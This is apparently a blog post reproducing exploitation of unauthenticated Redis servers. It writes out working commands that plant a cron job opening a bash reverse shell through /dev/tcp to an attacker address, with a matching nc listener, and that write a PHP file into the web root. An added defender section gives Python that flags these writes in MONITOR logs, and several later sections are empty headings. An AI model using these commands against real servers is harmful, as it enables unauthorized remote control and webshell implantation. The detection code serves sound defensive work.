xfeng

Redis unauthorized access vulnerability reproduction

title: "Redis Unauthorized Access Vulnerability Reproduction (Updating)"
date: 2021-12-17T15:42:45+08:00
lastmod: 2021-12-17T15:42:45+08:00
categories: [Vulnerability Reproduction]
tags: [Unauthorized Access, Vulnerability Reproduction]
summary: "Redis is a fully open-source, BSD-licensed, high-performance key-value database."

1. Vulnerability Introduction

By default, Redis binds to 0.0.0.0:6379. Without additional controls, such as firewall rules that block access from untrusted sources, the Redis service is exposed to the public network. If no password authentication is set (the password is usually empty), any user who can reach the target server can access Redis without authorization and read its data.

Attackers can exploit unauthorized access by using Redis's own config command to log in to the target server, add scheduled tasks, write webshells, and perform other operations.

The following operations are performed under the assumption that the Redis unauthorized access vulnerability already exists.

2. Exploiting Scheduled Tasks to Reverse Shell

Connection tool: https://github.com/caoxinyu/RedisClient/releases

https://github.com/dmajkic/redis/downloads

Run the following in the Redis session connected to the vulnerable host:

set xx "\n* * * * * bash -i >& /dev/tcp/IP Address/Port 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
save

Run the following locally:

nc -lvnp Port

3. Writing Webshell in Redis

config set dir /var/www/html
config set dbfilename test123.php
set webshell "<?php phpinfo(); ?>"
save
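
A defender-side view of sections 2 and 3, as an added example that is not part of the original post: both techniques appear in MONITOR output (or any command capture in the same format) as CONFIG SET dir pointing at a system directory, followed by SAVE. The sample lines, addresses, and function names are constructed for illustration.

```python
import re
import shlex

# Directories the two techniques above write into; extend for your own hosts.
SENSITIVE_DIRS = ("/var/spool/cron", "/var/www/html")
# MONITOR line format: <unix time> [<db> <client addr>] "arg" "arg" ...
LINE_RE = re.compile(r'^(\d+\.\d+) \[\d+ (\S+)\] (.*)$')

# Constructed sample MONITOR output (addresses and values are made up).
SAMPLE = [
    '1639727001.100000 [0 192.0.2.10:40112] "get" "session:42"',
    '1639727002.200000 [0 203.0.113.7:51234] "CONFIG" "SET" "dir" "/var/spool/cron/"',
    '1639727002.300000 [0 203.0.113.7:51234] "config" "set" "dbfilename" "root"',
    '1639727002.400000 [0 203.0.113.9:51300] "save"',
    '1639727003.000000 [0 192.0.2.10:40112] "config" "set" "dir" "/var/lib/redis"',
    '1639727003.100000 [0 192.0.2.10:40112] "bgsave"',
]


def parse_monitor_line(line):
    """Return (timestamp, client, args), or None for anything that is not a command line."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    try:
        args = shlex.split(m.group(3))
    except ValueError:  # truncated line with unbalanced quotes
        return None
    return (float(m.group(1)), m.group(2), args) if args else None


def find_file_write_abuse(lines):
    """Alert when SAVE/BGSAVE runs while dir points at a sensitive directory."""
    # dir/dbfilename are server-wide: one client may set them, another may save.
    state = {"dir": "", "dbfilename": None, "set_by": None}
    alerts = []
    for ts, client, args in filter(None, map(parse_monitor_line, lines)):
        cmd = [a.lower() for a in args]
        if cmd[:2] == ["config", "set"]:
            # CONFIG SET may carry several key/value pairs in one call.
            for key, value in zip(cmd[2::2], args[3::2]):
                if key == "dir":
                    state.update(dir=value.rstrip("/"), set_by=client)
                elif key == "dbfilename":
                    state["dbfilename"] = value
        elif cmd[0] in ("save", "bgsave"):
            d = state["dir"]
            if any(d == s or d.startswith(s + "/") for s in SENSITIVE_DIRS):
                alerts.append({"time": ts, "saved_by": client, **state})
    return alerts
```
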

4. Logging in to SSH with Redis Key

5. Exploiting Master-Slave Replication for RCE

6. SSRF Redis Reverse Shell

7. Reference Video
